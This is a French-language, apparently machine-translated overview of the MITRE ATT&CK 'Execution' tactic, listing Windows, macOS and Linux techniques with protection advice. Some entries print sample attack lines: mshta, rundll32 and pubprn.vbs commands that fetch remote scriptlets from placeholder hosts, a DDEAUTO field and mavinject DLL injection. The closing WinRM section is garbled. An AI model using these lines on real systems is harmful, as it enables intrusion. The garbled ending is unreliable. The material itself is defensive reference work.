Exécution

Liens vers toutes les parties:
Partie 1. Obtention de l'accès initial (accès initial)
Partie 2. Exécution
Partie 3. Fixation (persistance)
Partie 4. Escalade de privilèges
Partie 5. Évasion de la défense
Partie 6. Obtention des informations d'identification (accès aux informations d'identification)
Partie 7. Découverte
Partie 8. Mouvement latéral
Partie 9. Collecte de données (collecte)
Partie 10 Exfiltration
Partie 11. Commandement et contrôle

La phase «Exécution» décrit l'utilisation par les attaquants des moyens et méthodes d'exécution à distance et locale dans le système attaqué des différentes commandes, scripts et fichiers exécutables qui lui ont été livrés à l'étape précédente.

L'auteur n'est pas responsable des conséquences possibles de l'application des informations énoncées dans l'article, et s'excuse également pour d'éventuelles inexactitudes faites dans certaines formulations et termes. Les informations publiées sont une nouvelle version gratuite du contenu de MITRE ATT & CK.

AppleScript

Système: macOS
Droits: utilisateur
Description: le langage AppleScript a la capacité de fonctionner avec Apple Event - messages échangés entre les applications dans le cadre de la communication interprocessus (IPC). En utilisant Apple Event, vous pouvez interagir avec presque toutes les applications ouvertes localement ou à distance, déclencher des événements tels que l'ouverture de fenêtres et la pression de touches. Les scripts sont exécutés à l'aide de la commande: Osascript -e <script> .
Les attaquants peuvent utiliser AppleScript pour ouvrir secrètement des connexions SSH à des hôtes distants, donnant ainsi aux utilisateurs de fausses dialogues. AppleScript peut également être utilisé dans des types d'attaques plus courants, tels que les organisations Reverse Shell.

Recommandations de protection: vérification obligatoire des scripts AppleScript en cours d'exécution pour la signature d'un développeur de confiance.

CMSTP (AppLocker ByPass - CMSTP)

Système: Windows
Droits: utilisateur
Description: Microsoft Connection Manager Profile Installer (cmstp.exe) est l'utilitaire " Connection Manager Profile Installer " intégré à Windows. Cmstp.exe peut prendre un fichier inf comme paramètre, donc un attaquant pourrait préparer un INF malveillant spécial pour télécharger et exécuter des DLL ou des scriptlets (* .sct) à partir de serveurs distants contournant AppLocker et d'autres verrous, car cmstp.exe est signé avec un certificat numérique Microsoft.

Recommandations de protection: bloquer le lancement d'applications potentiellement dangereuses. Surveillance des startups C: \ Windows \ System32 \ cmstp.exe .

Interface de ligne de commande

Système: Windows, Linux, macOS
Droits: utilisateur, administrateur, système
Description: Vous pouvez interagir avec l'interface de ligne de commande localement, à distance via un logiciel d'accès à distance, en utilisant Reverse Shell, etc. Les commandes sont exécutées avec le niveau d'autorisation actuel du processus d'interface de ligne de commande, si la commande n'inclut pas d'appel au processus qui modifie les autorisations pour exécuter la commande (par exemple, une tâche planifiée).

Recommandations de sécurité: auditez et / ou verrouillez la ligne de commande à l'aide d'outils tels que AppLocker ou des politiques de restriction logicielle.

Éléments du panneau de commande

Système: Windows
Droits: utilisateur, administrateur, système
Description: la tactique consiste à utiliser les éléments du Panneau de configuration Windows par des attaquants pour exécuter des commandes arbitraires en tant que charge utile (par exemple, le virus Reaver ). Les objets malveillants peuvent être déguisés en contrôles standard et transmis au système à l'aide de pièces jointes de phishing. Les utilitaires de visualisation et de configuration des paramètres Windows sont des fichiers exe enregistrés et des fichiers CPL des éléments du panneau de configuration Windows. Les fichiers CPL sont en fait des DLL renommés qui peuvent être exécutés des manières suivantes:

• directement à partir de la ligne de commande: control.exe <file.cpl> ;
• à l'aide des fonctions API de shell32.dll: rundll32.exe shell32.dll, Control_RunDLL <file.cpl> ;
• double-cliquez sur le fichier cpl.

Les CPL enregistrés stockés dans System32 sont automatiquement affichés dans le Panneau de configuration de Windows et ont un identifiant unique stocké dans le registre:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ ControlPanel \ NameSpace

Les informations sur les autres CPL, par exemple, le nom d'affichage et le chemin d'accès au fichier cpl, sont stockées dans les sections Cpls et Propriétés étendues de la section:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Control Panel

Certains CPL lancés via le shell sont enregistrés dans la section:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Controls Folder \ {name} \ shellex \ PropertySheetHandlers

Recommandation de protection: restreignez le lancement et le stockage des fichiers d'éléments du panneau de configuration uniquement dans des dossiers protégés (par exemple, C: \ Windows \ System32 ), activez le contrôle de compte d'utilisateur (UAC) et AppLocker pour empêcher les modifications non autorisées du système. Bien sûr, l'utilisation d'un logiciel antivirus.

Protocole dynamique d'échange de données (DDE), code macro sans macro dans MSWord

Système: Windows
Droits: utilisateur
Description: DDE est un protocole pour l'interaction des applications qui partagent des données et de la mémoire partagée pour la messagerie. Par exemple, un document Word peut contenir un tableau qui est automatiquement mis à jour à partir d'un document Excel. La technique consiste à exploiter une vulnérabilité dans les applications MS Office liée à l'utilisation du protocole DDE dans MS Office. Les attaquants peuvent incorporer des objets dans des documents MS Office contenant des commandes qui seront exécutées à l'ouverture du document. Par exemple, un document Word peut contenir un objet Field dont la valeur indique la commande { commande DDEAUTO <, par exemple, c: \ windows \ system32 \ cmd.exe>} , qui sera exécutée à l'ouverture du document. Malgré la perte de pertinence, DDE peut être activé, y compris dans Windows 10 et MS Office 2016, à l'aide de la clé:
AllowDDE (DWORD) = 2 dans la clé de registre:
HKEY_CURRENT_USER \ Software \ Microsoft \ Office \ <version d'Office> \ Word \ Security .

Recommandations de protection: suivez les recommandations de Microsoft et installez la mise à jour MS Office appropriée. Dans Windows 10, vous pouvez également activer le paramètre Attack Surface Reduction (ASR) pour vous protéger contre les attaques DDE et les processus enfants par les applications MS Office.

Exécution via API

Système: Windows
Droits: utilisateur, administrateur, système
Description: les attaquants peuvent utiliser l'API pour exécuter des fichiers binaires. Les fonctions API telles que CreateProcess permettent aux programmes et aux scripts de démarrer des processus en spécifiant les chemins d'accès et les arguments nécessaires. Fonctions API pouvant être utilisées pour exécuter des fichiers binaires:

• CreateProcessA (), CreateProcessW ();
• CreateProcessAsUserA (), CreateProcessAsUserW ();
• CreateProcessInternalA (), CreateProcessInternalW ();
• CreateProcessWithLogonW (), CreateProcessWithTokenW ();
• LoadLibraryA (), LoadLibraryW ();
• LoadLibraryExA (), LoadLibraryExW ();
• LoadModule ();
• LoadPackagedLibrary ();
• WinExec ();
• ShellExecuteA (), ShellExecuteW ();
• ShellExecuteExA (), ShellExecuteExW ().

Recommandations de protection: les appels de fonction API sont un phénomène courant difficile à distinguer des activités malveillantes. Le vecteur de protection doit viser à empêcher le lancement des outils de l'attaquant au début de la chaîne d'attaque, à détecter les comportements malveillants et à bloquer les logiciels potentiellement dangereux.

Exécution par chargement de module

Système: Windows
Droits: utilisateur
Description: Il est possible d'organiser l'exécution de code à l'aide du chargeur de module Windows - NTDLL.dll, qui peut charger la bibliothèque DLL sur un chemin local ou réseau arbitraire. NTDLL.dll fait partie de l'API Windows et peut appeler des fonctions telles que CreateProcess () et LoadLibrary () .

Recommandations de protection: les appels de fonction API sont des fonctionnalités normales du système d'exploitation difficiles à distinguer des activités malveillantes. Le vecteur de protection doit viser à empêcher le lancement des outils de l'attaquant au début de la chaîne d'attaque. il est judicieux d'envisager de limiter le chargement des DLL aux répertoires% SystemRoot% et % ProgramFiles% .

Exploitation pour l'exécution client

Système: Windows, Linux, macOS
Droits: utilisateur
Description: La technique implique l'exécution de code à distance en utilisant des exploits dans les logiciels utilisateur. La présence de vulnérabilités dans les logiciels est souvent associée à une violation par les développeurs de logiciels des exigences d'une programmation sûre, ce qui conduit finalement à la possibilité de provoquer un comportement inattendu du logiciel.
Considérez certains types d'exploits:

• Exploits du navigateur. Les navigateurs Web sont la cible lorsque les attaquants utilisent des liens de chargement instantané et de phishing. Le système attaqué peut être compromis via un navigateur normal après que l'utilisateur a effectué certaines actions, par exemple en suivant le lien spécifié dans l'e-mail de phishing.
• Exploits d'applications Office. Les fichiers malveillants sont transmis sous forme de pièces jointes ou de liens de téléchargement. Pour exploiter la vulnérabilité, l'utilisateur doit ouvrir un document ou un fichier pour lancer l'exploit.
• Exploitations d'applications tierces. Les applications courantes, telles qu'Adobe Reader et Flash, souvent utilisées dans les environnements d'entreprise, sont ciblées par les cybercriminels. Selon le logiciel et la nature de la vulnérabilité, les vulnérabilités sont exploitées dans un navigateur ou lorsqu'un utilisateur ouvre un fichier, par exemple, des objets Flash peuvent être livrés dans des documents MS Office.

Recommandations de protection: installation en temps opportun des mises à jour pour les applications utilisées. L'utilisation de divers moyens d'isolement des applications potentiellement vulnérables - bacs à sable, outils de microsegmentation et de virtualisation, par exemple, Sandboxie pour Windows et Apparmor, Docker pour Linux. Des systèmes de protection contre les exploits tels que Windows Defender Exploit Guard (WDEG) pour Windows 10 ou Enhanced Mitigation Experience Toolkit (EMET) pour les versions antérieures de Windows sont également recommandés.

Interface utilisateur graphique

Système: Windows, Linux, macOS
Droits: utilisateur, administrateur, système
Description: un fichier exécutable ou un script est lancé lors de l'interaction avec un fichier via une interface utilisateur graphique (GUI) dans une session interactive ou distante, par exemple, via le protocole RDP.

Conseils de sécurité: protégez les informations d'identification qui peuvent être utilisées pour se connecter à distance au système. Identifiez les utilitaires système inutiles, les logiciels tiers qui peuvent être utilisés pour entrer en mode distant interactif.

InstallUtil

Système: Windows
Droits: utilisateur
Description: InstallUtil est un utilitaire de ligne de commande Windows qui peut installer et désinstaller des applications conformes aux spécifications du .NET Framework. Installutil est automatiquement installé avec VisualStudio. Le fichier InstallUtil.exe est signé par un certificat Microsoft et est stocké dans:
C: \ Windows \ Microsoft.NET \ Framework \ v [version] \ InstallUtil.exe
Les attaquants peuvent utiliser la fonctionnalité InstallUtil pour exécuter le code proxy et contourner les listes blanches des applications.

Recommandations de protection: Il est possible qu'InstallUtil ne soit pas utilisé sur votre système, pensez donc à bloquer l'installation d'InstallUtil.exe.

Pilotes LSASS (Pilote LSASS)

Système: Windows
Droits: administrateur, système
Description: Local Security Authority (LSA) est un sous-système Windows qui fournit l'authentification des utilisateurs. Le LSA inclut plusieurs DLL interconnectées dynamiques qui s'exécutent dans le processus LSASS.exe. Les attaquants peuvent attaquer LSASS.exe en remplaçant ou en ajoutant des pilotes LSA illégitimes, puis en exécutant du code arbitraire. La technique est implémentée dans les logiciels malveillants Pasam et Wingbird, qui «lancent» les DLL modifiées utilisées pour charger LSASS. Dans ce cas, le code malveillant est exécuté avant que la DLL illégitime provoque un crash et un crash de service LSASS ultérieur.

Recommandations de protection: dans Windows 8.1 et Windows Server 2012 R2, activez la protection LSA en définissant la clé de registre:
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ RunAsPPL
à la valeur dword: 00000001

Cette protection garantit que les plug-ins et pilotes chargés par LSA sont signés numériquement par Microsoft. Dans Windows 10 et Server 2016, activez Windows Defender Credential Guard pour exécuter lsass.exe dans un environnement virtuel isolé. Activez le mode de recherche de DLL sécurisé pour réduire le risque de chargement de bibliothèques malveillantes dans lsass.exe:
HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ Session Manager \ SafeDllSearchMode .

Launchctl

Système: macOS
Droits: utilisateur, administrateur
Description: Launchctl - un utilitaire pour gérer le service Launchd. À l'aide de Launchctl, vous pouvez gérer les services système et utilisateur (LaunchDeamons et LaunchAgents), ainsi qu'exécuter des commandes et des programmes. Launchctl prend en charge les sous-commandes de ligne de commande, interactives ou redirigées à partir de l'entrée standard:
launchctl submit -l [nom_étiquette] - / Chemin / vers / chose / vers / exécuter '' arg "'' arg" '' arg " .
En démarrant et en redémarrant les services et les démons, les attaquants peuvent exécuter du code et même contourner la liste blanche si launchctl est un processus autorisé, cependant le chargement, le déchargement et le redémarrage des services et des démons peuvent nécessiter des privilèges élevés.

Recommandations de sécurité: limitation des droits des utilisateurs pour créer des agents de lancement et lancer des démons de lancement à l'aide de la stratégie de groupe. En utilisant l'application KnockKnock , vous pouvez découvrir des programmes qui utilisent launchctl pour gérer les agents de lancement et les démons de lancement.

Exécution avec la planification des travaux locaux

Système: Linux, macOS
Droits: utilisateur, administrateur, root
Description: les attaquants peuvent créer des tâches dans les systèmes attaqués pour le lancement non autorisé de programmes au démarrage du système ou selon un calendrier. Les systèmes Linux et Apple prennent en charge plusieurs méthodes pour planifier le lancement de tâches d'arrière-plan périodiques: cron, at, launchd. Contrairement au planificateur de tâches Windows, la planification des tâches sur les systèmes Linux ne peut pas être effectuée à distance, sauf pour l'utilisation de sessions distantes comme SSH.

Recommandations de protection: limitation des droits des utilisateurs pour créer des tâches planifiées, blocage des utilitaires système et autres logiciels pouvant être utilisés pour planifier des tâches.

Mshta

Système: Windows
Droits: utilisateur
Description: Mshta.exe (situé dans C: \ Windows \ System32 \ ) est un utilitaire qui exécute des applications HTML Microsoft (* .HTA). Les applications HTA fonctionnent avec les mêmes technologies qu'InternetExplorer, mais en dehors du navigateur. Étant donné que Mshta traite les fichiers en contournant les paramètres de sécurité du navigateur, les attaquants peuvent utiliser mshta.exe pour proxy l'exécution de fichiers HTA malveillants, Javascript ou VBScript. Le fichier malveillant peut être lancé via le script intégré:
mshta vbscript: Close (Execute (script "GetObject (" ": https [:] // webserver / payload [.] sct" ")"))))

ou directement, à l'URL:
mshta http [:] // webserver / payload [.] hta

Recommandations de protection: la fonctionnalité de mshta.exe est associée aux anciennes versions d'IE qui ont atteint la fin de leur cycle de vie. Bloquer Mshta.exe si vous n'utilisez pas ses fonctionnalités.

Powerhell

Système: Windows
Droits: utilisateur, administrateur
Description: PowerShell (PS) est une puissante interface de ligne de commande interactive et un environnement de script inclus avec Windows. Les attaquants peuvent utiliser PS pour collecter des informations et exécuter du code. Par exemple, la cmdlet Start-Process peut exécuter un fichier exécutable; la cmdlet Invoke-Command exécutera la commande localement ou sur un ordinateur distant. PS peut également être utilisé pour télécharger et exécuter des fichiers exécutables à partir d'Internet, sans les enregistrer sur votre disque dur. Pour les connexions à distance utilisant PS, vous avez besoin des droits d'administrateur. Il existe un certain nombre d'outils pour attaquer PS:

• Empire
• Powersploit
• PSAttack

Recommandations de protection: PS peut être supprimé du système s'il n'est pas nécessaire. Si PS est requis, les administrateurs doivent se limiter à l'exécuter uniquement en exécutant des scripts signés. Désactivez le service WinRM pour empêcher l'exécution à distance des scripts PS. Il convient de noter qu'il existe des méthodes pour contourner les politiques d'exécution de script PS .

Regsvcs / regasm

Système: Windows
Droits: utilisateur, administrateur
Description: Regsvcs et Regasm sont des utilitaires d'utilitaires Windows utilisés pour s'enregistrer auprès du système d'assemblage COM (Object Object Model) .NET. Les deux fichiers sont signés numériquement par Microsoft. Les attaquants peuvent utiliser Regsvcs et Regasm pour exécuter le code proxy lorsque l'attribut est le code qui doit être exécuté avant l'enregistrement ou la désinscription: [ComRegisterFunction] ou [ComUnregisterFunction]. Le code avec de tels attributs peut être lancé même si le processus s'exécute avec des privilèges insuffisants ou même se bloque au démarrage.

Recommandations de protection: bloquez Regsvcs.exe et Regasm.exe s'ils ne sont pas utilisés sur votre système ou réseau.

Regsvr32 (Squiblydoo)

Système: Windows
Droits: utilisateur, administrateur
Description: Regsvr32.exe est un utilitaire de console pour l'enregistrement et l'annulation de l'enregistrement des contrôles OLE, tels que ActiveX et DLL, dans le Registre. Regsvr32.exe est signé numériquement par Microsoft et peut être utilisé pour exécuter du code proxy. Par exemple, en utilisant Regsvr32, vous pouvez télécharger un fichier XML contenant des morceaux de code Java (scriptlets) qui contourneront la liste blanche.

Recommandations de protection: Attack Surface Reduction (ASR) dans EMET et Advanced Theart Protection dans Windows Defender peuvent bloquer l'utilisation de Regsvr32.exe pour contourner les listes blanches.

Rundll32 (Poweliks)

Système: Windows
Droits: utilisateur
Description: Rundll32.exe est un utilitaire système pour lancer des programmes situés dans des bibliothèques connectées dynamiquement, il peut être appelé pour proxy le fichier binaire, exécuter des fichiers de contrôle Windows (.cpl) via les fonctions Shel32.dll non documentées - Control_RunDLL et Control_RunDLLAsUser . Un double-clic sur le fichier .cpl entraîne également l'exécution de Rundll32.exe. Rundll32 peut également être utilisé pour exécuter des scripts tels que JavaScript:
rundll32.exe javascript: "\ .. \ mshtml, RunHTMLApplication"; document.write (); GetObject ("scrirpt: https [:] // www [.] exemple [.] com / malveillant.sct") "
La méthode ci-dessus d'utilisation de rundll32.exe est détectée par un logiciel antivirus comme un virus comme Poweliks.
Recommandations de protection: Attack Surface Reduction (ASR) dans EMET et Advanced Theart Protection dans Windows Defender peuvent bloquer l'utilisation de Rundll32.exe pour contourner la liste blanche.

Exécution d'une tâche planifiée Windows

Système: Windows
Droits: utilisateur, administrateur, système
Description: des utilitaires tels que at, schtasks et Windows Task Scheduler peuvent être utilisés pour planifier des programmes et des scripts à exécuter à une date et une heure spécifiques. Une tâche peut être planifiée sur un système distant, à condition que RPC soit utilisé pour l'authentification et que le partage d'imprimantes et de fichiers soit activé. De plus, des droits d'administrateur sont requis pour planifier des tâches sur un système distant. Les attaquants peuvent utiliser la planification de tâches à distance pour exécuter des programmes au démarrage du système ou dans le contexte d'un compte spécifique.

Recommandations de protection: activez la restriction des droits pour créer des tâches pour les utilisateurs au nom du système dans le registre:
HKLM \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ SubmitControl = 0
Remarque:SubmitControl = 1, permet aux membres du groupe Opérateurs de serveur de créer des travaux.

Configurez également l'objet de stratégie de groupe approprié:
Configuration ordinateur> [Stratégies]> Paramètres Windows> Paramètres de sécurité> Stratégies locales> Options de sécurité: Contrôleur de domaine: autorisez les opérateurs de serveur à planifier des tâches: désactivé
Configuration ordinateur> [Politiques]> Paramètres Windows> Paramètres de sécurité> Local Stratégies> Attribution des droits utilisateur: augmentez la priorité de planification
Envisagez d'utiliser PowerSploit Framework, qui contient le module PowerUP pour rechercher des vulnérabilités dans la résolution des tâches planifiées, dans votre activité.

Scripting

Système: Windows, Linux, macOS
Droits:
Description de l' utilisateur : Les attaquants peuvent utiliser des scripts pour automatiser leurs actions, accélérer les tâches opérationnelles et, par conséquent, réduire le temps nécessaire pour y accéder. Certains langages de script peuvent être utilisés pour contourner les mécanismes de surveillance des processus en interagissant directement avec le système d'exploitation au niveau de l'API au lieu d'appeler d'autres programmes. Les scripts peuvent être intégrés dans des documents Office sous forme de macros, puis utilisés pour des attaques de phishing. Dans ce cas, les attaquants s'attendent à ce que l'utilisateur exécute le fichier de macro ou que l'utilisateur accepte d'activer la macro. Il existe plusieurs cadres populaires pour implémenter les scripts - Metasploit, Veil, PowerSploit.

Conseils de sécurité: limitez l'accès aux scripts tels que VBScript ou PowerShell. Sous Windows, configurez les paramètres de sécurité de MS Office en activant l'affichage sécurisé et l'interdiction des macros via GPO. Si des macros sont nécessaires, autorisez uniquement l'exécution de macros signées numériquement approuvées. Utilisez la micro-segmentation et la virtualisation des applications, par exemple, Sandboxie pour Windows et Apparmor, Docker pour Linux.

Démarrage des services (exécution du service)

Système:
Droits Windows : Administrateur,
Description du système : Les attaquants peuvent exécuter un code binaire, une commande ou un script en utilisant des méthodes spéciales d'interaction avec les services Windows, par exemple, en utilisant le Gestionnaire de contrôle des services (SCM), vous pouvez créer de nouveaux services et modifier ceux qui sont en cours d'exécution.

Recommandations de protection:Assurez-vous que le paramètre de privilège actuel sur le système interdit le lancement de services avec des privilèges élevés à partir d'utilisateurs avec des privilèges faibles. Assurez-vous que les fichiers exécutables avec des autorisations élevées sur le système ne peuvent pas être remplacés ou modifiés par des utilisateurs avec des autorisations inférieures. Envisagez d'utiliser des outils pour restreindre le lancement de programmes potentiellement dangereux à l'aide d'AppLocker et configurer des stratégies de restriction logicielle .

Exécution par exécution d'un proxy binaire signé

Système:
Droits Windows : Utilisateur
Description: Les fichiers binaires signés avec des certificats numériques approuvés peuvent être exécutés sur des systèmes Windows protégés par une vérification de signature numérique. Plusieurs fichiers Microsoft signés par défaut lors de l'installation de Windows peuvent être utilisés pour proxy le lancement d'autres fichiers:
Mavinject.exe est un utilitaire Windows qui permet d'exécuter du code. Mavinject peut être utilisé pour entrer la DLL dans le processus en cours d'exécution:
"C: \ Program Files \ Fichiers communs \ microsoft shared \ ClickToRun \ MavInject32.exe" [PID] / INJECTRUNNING [PATH DLL]
C: \ Windows \ system32 \ mavinject.exe [PID ] / INJECTRUNNING [CHEMIN DLL]
SyncAppvPublishingServer.exe- peut être utilisé pour exécuter des scripts PowerShell sans exécuter PowerShell.exe.
Il existe plusieurs autres fichiers binaires similaires .

Recommandations de protection: de nombreux fichiers signés peuvent ne pas être utilisés sur votre système, pensez donc à bloquer leur lancement.

Exécution via des scripts signés (exécution du proxy de script signé)

Système:
Droits Windows : Utilisateurs
Description: Les scripts signés avec des certificats approuvés peuvent être utilisés pour proxyer des fichiers malveillants, par exemple, PubPrn.vbs est signé avec un certificat Microsoft et peut être utilisé pour exécuter un fichier à partir d'un serveur distant:
cscript C: \ Windows \ System32 \ Printing_Admin_Scripts \ ru-RU \ pubprn.vbs 127.0.0.1 script: http [:] // 192.168.1.100/hi.png

Recommandations de protection: De tels scripts signés peuvent ne pas être requis sur votre système, pensez donc à bloquer leur lancement.

Équipe source

Système: Linux et macOS
Droits:
Description de l' utilisateur : Source - une commande qui vous permet de lire et d'exécuter toutes les commandes du fichier spécifié dans le shell de commande actuel, ce qui signifie que toutes les variables d'environnement spécifiées seront visibles dans tous les scripts et commandes qui seront lancés. La source peut être démarrée de deux manières:
source / chemin / vers / nom de fichier [arguments] ou . / path / to / filename [arguments]
Notez l'espace après le point. Sans espace, le programme sera lancé dans un nouveau shell de commande. Les attaquants peuvent utiliser Source pour exécuter des fichiers non marqués du drapeau «x» en tant que fichiers exécutables.

Recommandations de protection: Il est assez difficile d'empêcher l'utilisation de commandes intégrées dans le système en raison de leur légalité.Par conséquent, le vecteur de protection doit viser à empêcher les actions malveillantes aux stades antérieurs de l'attaque, par exemple au stade de la livraison ou de la création d'un fichier malveillant dans le système.

Espace après le nom de fichier

Système: Linux, macOS
Droits: Description de l' utilisateur
:Les attaquants peuvent masquer le vrai type d'un fichier en modifiant son extension. Pour certains types de fichiers (ne fonctionne pas avec les fichiers .app), l'ajout d'un caractère espace à la fin du nom de fichier changera la façon dont le fichier est traité par le système d'exploitation. Par exemple, s'il existe un fichier exécutable Mach-O avec le nom evil.bin, alors lorsque l'utilisateur double-clique, le système d'exploitation lancera Terminal.app et l'exécutera. Si le même fichier est renommé evil.txt, alors avec un double-clic il démarrera dans un éditeur de texte. Cependant, si le fichier est renommé «evil.txt» (un espace à la fin), puis en double-cliquant sur le type du vrai fichier, le système d'exploitation sera déterminé et le fichier binaire démarrera. Les attaquants peuvent utiliser cette technique pour inciter un utilisateur à lancer un fichier exécutable malveillant.

Recommandations de protection:L'utilisation de cette technique est difficile à empêcher car un attaquant utilise des mécanismes de fonctionnement standard du système d'exploitation, de sorte que le vecteur de protection doit viser à empêcher des actions malveillantes à des stades antérieurs de l'attaque, par exemple au stade de la livraison ou de la création d'un fichier malveillant dans le système.

Exécution à l'aide d'un logiciel d'administration réseau tiers (logiciel tiers)

Système: Windows, Linux, macOS
Droits: utilisateur, administrateur,
description du système : le vecteur d'attaque est dirigé vers des logiciels tiers et des systèmes de déploiement de logiciels utilisés dans le réseau attaqué à des fins administratives (SCCM, VNC, HBSS, Altris, etc.). Dans le cas où un attaquant accède à de tels systèmes, l'adversaire peut exécuter du code à distance sur tous les hôtes connectés au système de déploiement de logiciels. Les droits requis pour implémenter cette technique dépendent de la configuration particulière du système. Les informations d'identification locales peuvent être suffisantes pour accéder au serveur de déploiement de logiciels; cependant, un compte administrateur peut être requis pour démarrer le déploiement de logiciels.

Recommandations de protection:Vérifiez le niveau de sécurité de vos systèmes de déploiement de logiciels. Assurez-vous que l'accès aux systèmes de gestion de logiciels est limité, contrôlé et protégé. Utilisez strictement les politiques de pré-approbation obligatoires pour le déploiement de logiciels à distance. Donner accès aux systèmes de déploiement logiciel à un nombre limité d'administrateurs, assurer l'isolement du système de déploiement logiciel. Assurez-vous que les informations d'identification pour l'accès au système de déploiement de logiciels sont uniques et ne sont pas utilisées dans d'autres services sur le réseau d'entreprise. Si le système de déploiement logiciel est configuré pour exécuter uniquement des fichiers binaires signés, vérifiez que les certificats approuvés ne sont pas stockés dans le système de déploiement logiciel lui-même, mais se trouvent sur un système inaccessible à distance.

Équipe de piège

Système: Linux, macOS
Droits: utilisateur, administrateur
Description: La commande trap protège le script des interruptions (ctrl + c, ctrl + d, ctrl + z, etc.). Si le script reçoit un signal d'interruption spécifié dans les arguments de la commande trap, alors il traite lui-même le signal d'interruption, tandis que le shell ne traitera pas un tel signal. Les attaquants peuvent utiliser trap pour enregistrer le code qui sera exécuté lorsque le shell recevra certains signaux d'interruption.

Recommandations de protection:L'utilisation de cette technique est difficile à empêcher, car l'attaquant utilise les mécanismes standards de l'OS. Le vecteur de protection doit viser à empêcher les actions malveillantes aux stades antérieurs de l'attaque, par exemple au stade de la livraison ou de la création d'un fichier malveillant dans le système.

Exécution via Trusted Developer Utilities

Système:
Droits Windows : Utilisateur
Description: Il existe de nombreux utilitaires utilisés par les développeurs de logiciels et qui peuvent être utilisés pour exécuter du code sous diverses formes lors du développement de logiciels, du débogage et de l'ingénierie inverse. Ces utilitaires sont souvent signés avec des certificats numériques qui leur permettent de proxyer du code malveillant dans le système d'exploitation, en contournant les mécanismes de sécurité et les feuilles blanches d'applications.

MsbulidEst une plate-forme de développement logiciel utilisée dans Visual Studio. Il utilise des projets sous forme de fichiers XML qui décrivent les exigences pour la construction de diverses plates-formes et configurations. MSBuild de .NET version 4 vous permet d'insérer du code C # dans un projet XML, de le compiler, puis de l'exécuter. MSBulid.exe est signé par Microsoft Digital Certificate.
DNX - .Net Execution Environmant (dnx.exe) est un kit de développement pour Visual Studio Enterprise. Arrêté depuis la CLI .NET Core en 2016. DNX est absent des versions standard de Windows et ne peut être présent que sur les hôtes développeurs lors de l'utilisation de .Net Core et ASP.NET Core 1.0. Dnx.exe est signé numériquement et peut être utilisé pour exécuter du code proxy.
RCSI- interface de ligne de commande non interactive pour C #, similaire à csi.exe. Il a été introduit dans une version antérieure de la plate-forme de compilation Roslyn .Net. Rcsi.exe est signé par Microsoft Digital Certificate. Les fichiers de script C # .csx peuvent être écrits et exécutés à l'aide de Rcsi.exe à l'invite de commandes Windows.
WinDbg / CDB est le noyau MS Windows et un utilitaire de débogage en mode utilisateur. Le débogueur de console Microsoft cdb.exe est également un débogueur en mode utilisateur. Les deux utilitaires peuvent être utilisés comme des outils autonomes. Couramment utilisé dans le développement de logiciels, l'ingénierie inverse et ne peut pas être trouvé sur les systèmes Windows standard. Les fichiers WinDbg.exe et CDB.exe sont signés par Microsoft Digital Certificate et peuvent être utilisés pour le code proxy.
Tracker- utilitaire de suivi des fichiers tracker.exe. Inclus dans .NET dans le cadre de MSBuild. Utilisé pour enregistrer les appels dans le système de fichiers Windows 10. Les attaquants peuvent utiliser tracker.exe pour exécuter DLL dans divers processus. Tracker.exe est également signé avec un certificat Microsoft.

Recommandations de protection: tous les fichiers ci-dessus doivent être supprimés du système s'ils ne sont pas utilisés aux fins prévues par les utilisateurs.

Exécution utilisateur

Système: Windows, Linux, macOS
Droits:
Description de l' utilisateur : Les attaquants peuvent compter sur certaines actions de l'utilisateur pour effectuer certaines actions. Il peut s'agir de l'exécution directe de code lorsqu'un utilisateur ouvre un fichier exécutable malveillant fourni sous forme de pièce jointe de phishing avec une icône et une extension de fichier de document visible. Parfois, d'autres techniques peuvent être utilisées, par exemple, lorsqu'un utilisateur clique sur un lien dans un e-mail de phishing, ce qui conduit à l'exploitation d'une vulnérabilité de navigateur. La technique de «l'exécution de l'utilisateur» est souvent utilisée à d'autres étapes de l'invasion, par exemple lorsqu'un attaquant place un fichier dans un répertoire partagé ou sur le bureau de l'utilisateur, en espérant qu'il «clique» dessus.

Conseils de protection: sensibilisez les utilisateurs. Blocage du téléchargement de fichiers tels que .scr, .exe, .pif, .cpl, etc. L'utilisation d'un logiciel antivirus et la mise en œuvre de systèmes IPS.

Instrumentation de gestion Windows (WMI)

Système: Windows
Droits: utilisateur, administrateur
Description: WMI est un outil d'administration de Windows qui fournit un accès local et à distance aux composants du système Windows. WMI utilise SMB et RPCS (s'exécute sur le port 135). Les attaquants peuvent utiliser WMI pour interagir avec des systèmes locaux et distants, et également comme moyen d'effectuer de nombreuses opérations tactiques, telles que la collecte d'informations au stade de la revue des ressources (découverte) et l'exécution de fichiers à distance pendant le "mouvement littéral".

Recommandations de protection:La désactivation de WMI et de RPCS peut entraîner une instabilité du système. Par défaut, seuls les administrateurs peuvent se connecter à distance au système via WMI. Empêchez la duplication des privilèges entre les comptes administratifs et autres comptes privilégiés.

Gestion à distance de Windows (WinRM)

: Windows
: ,
: Windows Remote Management (WinRM) — , (, , , . winrm , PowerShell.

: WinRM. , WinRM . WinRM , WinRM .